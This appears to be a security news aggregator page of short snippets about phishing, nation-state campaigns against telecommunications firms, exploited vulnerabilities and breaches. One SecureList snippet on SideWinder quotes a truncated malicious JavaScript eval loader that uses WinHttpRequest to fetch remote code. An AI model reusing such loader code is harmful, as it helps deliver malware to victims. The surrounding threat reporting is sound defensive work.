The Last Watchdog

JANUARY 7, 2025

AI-generated phishing emails, adaptive botnets, and automated reconnaissance tools are now common components of cybercriminal tactics. Advanced detection CyTwist recently demonstrated its advanced detection capabilities during a red team simulation with a major telecommunications provider.

Threat Detection

SecureWorld News

MAY 16, 2025

Google's report confirms that UNC3944 continues to "demonstrate persistence and adaptability in targeting organizations, particularly those in the retail, hospitality, and telecommunications sectors." Strengthen identity and access controls Enforce phishing-resistant MFA. Here's how defenders can get ahead of UNC3944.

Retail

SecureList

MARCH 10, 2025

Infection flow The attacker sends spear-phishing emails with a DOCX file attached. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels. Furthermore, we observed attacks against entities associated with nuclear energy.

Energy and Utilities

Security Affairs

NOVEMBER 17, 2024

CISA adds Palo Alto Networks Expedition bugs to its Known Exploited Vulnerabilities catalog Hackers target critical flaw CVE-2024-10914 in EOL D-Link NAS Devices China-linked threat actors compromised multiple telecos and spied on a limited number of U.S.

Cryptocurrency

SecureWorld News

FEBRUARY 12, 2025

"Technology is an integral part of our lives that has become increasingly linked to critical infrastructure and the services we rely on daily like our hospitals, transit systems, energy suppliers, and telecommunications systems," said a press release from Public Safety Canada.

Cyber threats

Security Affairs

MAY 4, 2025

CISA adds SonicWall SMA100 and Apache HTTP Server flaws to its Known Exploited Vulnerabilities catalog Pro-Russia hacktivist group NoName057(16) is targeting Dutch organizations FBI shared a list of phishing domains associated with the LabHost PhaaS platform Canadian electric utility Nova Scotia Power and parent company Emera suffered a cyberattack (..)

Cybercrime

Security Affairs

JUNE 29, 2025

House banned WhatsApp on government devices due to security concerns Russia-linked APT28 use Signal chats to target Ukraine official with malware China-linked APT Salt Typhoon targets Canadian Telecom companies U.S.

Data breaches

Security Affairs

DECEMBER 1, 2024

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

Cybercrime

Security Boulevard

MARCH 24, 2025

but given the Salt Typhoon breach and the apparent lackluster security practices and culture at just about every American telecommunications company, this was too interesting to ignore. Cape is a mobile carrier startup claiming to provide a more secure and private service alternative to traditional telecommunications services.

Surveillance

SecureWorld News

JULY 1, 2025

officials revealed that the Chinese group Volt Typhoon had maintained undetected access to power grids, ports, and telecommunications providers for as long as five years—long enough to map every breaker, valve, and switch they might someday wish to sabotage. In February, U.S. The human element remains a vulnerability.

Social Engineering

SecureWorld News

APRIL 29, 2025

The blackout, which began around midday local time, halted public transportation, grounded flights, and disrupted critical services such as hospitals and telecommunications. Phishing scams, money transfer requests, and the use of fake travel tickets may also increase during this time."

Cyber Attacks

Digital Shadows

MARCH 17, 2025

In one example, the Chinese group APT5, operating from the most active nation state targeting VPN devices, maintained access to compromised VPN infrastructure in the telecommunications sector for months. 3 Whats Behind its Enduring Popularity? What makes CVE-2018-13379 so dangerous is its stickiness.

VPN

Security Affairs

OCTOBER 27, 2024

CISA adds ScienceLogic SL1 flaw to its Known Exploited Vulnerabilities catalog VMware failed to fully address vCenter Server RCE flaw CVE-2024-38812 Cisco states that data published on cybercrime forum was taken from public-facing DevHub environment Internet Archive was breached twice in a month Unknown threat actors exploit Roundcube Webmail flaw (..)

Data breaches

Security Affairs

FEBRUARY 15, 2025

Sorry, It’s Windows Malware Malware Mobile Indian Cyber Heist: FatBoyPanel And His Massive Data Breach Google Tag Manager Skimmer Steals Credit Card Info From Magento Site From South America to Southeast Asia: The Fragile Web of REF7707 Deep Learning-Driven Malware Classification with API Call Sequence Analysis and Concept Drift Handling Hacking (..)

Spyware

Krebs on Security

NOVEMBER 5, 2024

.” Sources involved in the investigation said UNC5537 has focused on hacking into telecommunications companies around the world. ” The term “Beige Group” came up in reporting on two stories published here in 2020. Frequent targets of the Beige group included employees at numerous top U.S.

Cybercrime

SecureWorld News

JULY 22, 2025

Disrupting a single subsea telecommunications cable can incur "more than 24 million euros per day" in costs, while damages to oil and gas pipelines can easily reach "tens of billions of euros" for repairs alone. The stakes are astronomically high. GPS spoofing and jamming are also significant concerns for navigation systems.

Surveillance

SecureList

OCTOBER 23, 2024

Attackers’ attempts to contact crypto-influencers The attackers’ activity was not limited to X — they also used professionally designed websites with additional malware, premium accounts on LinkedIn, and spear phishing through email.

Engineering

SecureList

DECEMBER 18, 2024

Telegram channel suggests that the hacktivists do not use phishing emails as an initial attack vector. targets companies from Russia and Belarus in various industries, including government and commercial organizations, entertainment and technology firms, telecommunications companies and industrial enterprises. Messages from the C.A.S

Encryption

SecureList

OCTOBER 15, 2024

SideWinder’s most recent campaign schema Infection vectors The SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. javascript:eval("v=ActiveXObject;x=new v("WinHttp.WinHttpRequest.5.1");x.open("GET",

Malware

Security Boulevard

MARCH 17, 2025

Cybersecurity and Infrastructure Security Agency reveals that 90% of initial access to critical infrastructure comes via identity compromise like phishing, compromised passwords, identity systems and misconfigurations. But CVEs are only part of the picture. A report from the U.S.

Risk

Krebs on Security

NOVEMBER 26, 2024

In a SIM-swap, fraudsters use credentials that are phished or stolen from mobile phone company employees to divert a target’s phone calls and text messages to a device they control. However, Vars_Secc would be banned from XSS after attempting to sell access to the Russian telecommunications giant Rostelecom. [In

DDOS

Security Boulevard

JUNE 27, 2025

While this activity has been limited to distributed-denial-of-service (DDoS) attacks, there have also been recent reports of an increase in targeted phishing attacks. Reports have cited that threat actors have begun targeting U.S. finance, defense, and energy sectors. Some aliases overlap between these groups.

Accountability

Security Affairs

MARCH 23, 2025

International Press Newsletter Cybercrime Blockchain gaming platform WEMIX hacked to steal $6.1 million Babuk2 Ransomware: Extortion Attempts Based on False Claims Western Alliance Bank notifies 21,899 customers of data breach Cybercriminals Exploit Checkpoints Driver in a BYOVD Attack!

Spyware

Security Boulevard

APRIL 18, 2025

Protect all administrative access with phishing-resistant multi-factor authentication. Other mitigation recommendations include: Disable unnecessary network edge services, especially unsecured ones such as HTTP. Remove direct internet access to device management interfaces, restricting admins to internal and secure management networks.

Risk

Security Affairs

JULY 20, 2025

Tech Support Scam, Arrests Key Operatives in Noida Call Center BaitTrap – The rise of baiting news sites behind online investment fraud FBI Atlanta Seizes Major Video Game Piracy Websites GLOBAL GROUP: Emerging Ransomware-as-a-Service, Supporting AI Driven Negotiation and Mobile Control Panel for Their Affiliates Former U.S.

Data breaches

Security Affairs

AUGUST 8, 2025

French telecommunications company Bouygues Telecom suffered a cyberattack that resulted in the compromise of personal information of 6.4 Bouygues Telecom advises customers who received its email or text alert to remain vigilant against potential fraud attempts, such as phishing emails or scam calls. million customers.

Data breaches

Krebs on Security

FEBRUARY 1, 2021

Authorities in the United Kingdom have arrested a 20-year-old man for allegedly operating an online service for sending high-volume phishing campaigns via mobile text messages. ” SMS Bandits offered an SMS phishing (a.k.a. Image: osint.fans. “But on the telecom front they were using fairly sophisticated tactics.”

Phishing

Krebs on Security

SEPTEMBER 1, 2023

Domain names ending in “ US ” — the top-level domain for the United States — are among the most prevalent in phishing scams, new research shows. government, which is frequently the target of phishing domains ending in.US. US phishing domains.US US phishing domains.US This is noteworthy because.US

Phishing

Trend Micro

JULY 29, 2021

We summarize the characteristics, threats, and recommendations to improve the security posture of enterprises' and telecommunications companies' IT infrastructure.

Telecommunications

Schneier on Security

JANUARY 8, 2021

Just like Capricorn, Helix Kitten (also known as APT 35 or OilRig) is a skilled navigator of vast online networks, maneuvering deftly across an array of organizations, including those in aerospace, energy, finance, government, hospitality, and telecommunications.

Telecommunications

Krebs on Security

OCTOBER 31, 2023

The top-level domain for the United States — US — is home to thousands of newly-registered domains tied to a malicious link shortening service that facilitates malware and phishing scams, new research suggests. domains as among the most prevalent in phishing attacks over the past year. US phishing domains.

Phishing

Krebs on Security

AUGUST 19, 2020

The COVID-19 epidemic has brought a wave of email phishing attacks that try to trick work-at-home employees into giving away credentials needed to remotely access their employers’ networks. For now at least, they appear to be focusing primarily on companies in the financial, telecommunications and social media industries.

Phishing

The Hacker News

FEBRUARY 14, 2025

The attacks have targeted government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas

Telecommunications

Krebs on Security

JANUARY 29, 2020

Earlier this week, vice.com reported that hackers are phishing workers at major U.S. telecommunications companies to gain access to internal company tools. telecom companies to take over customer cell phone numbers.

Social Engineering

Security Affairs

OCTOBER 13, 2021

Threat actors are using mathematical symbols on impersonated company logos to evade detection in phishing campaigns. Researchers from anti-phishing cybersecurity firm INKY have detailed a new technique to evade detection in phishing attacks, it leverages using mathematical symbols on impersonated company logos.

Phishing

Security Affairs

MAY 28, 2021

NOBELIUM focuses on government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. The phishing campaign detected by MSTIC leveraged the Google Firebase platform to provide an ISO file containing the malicious code.

Phishing

Malwarebytes

AUGUST 13, 2021

In an extensive report about a phishing campaign , the Microsoft 365 Defender Threat Intelligence Team describes a number of encoding techniques that were deployed by the phishers. We just didn’t realize that phishing campaigns was one of them! We just didn’t realize that phishing campaigns was one of them! The campaign.

Phishing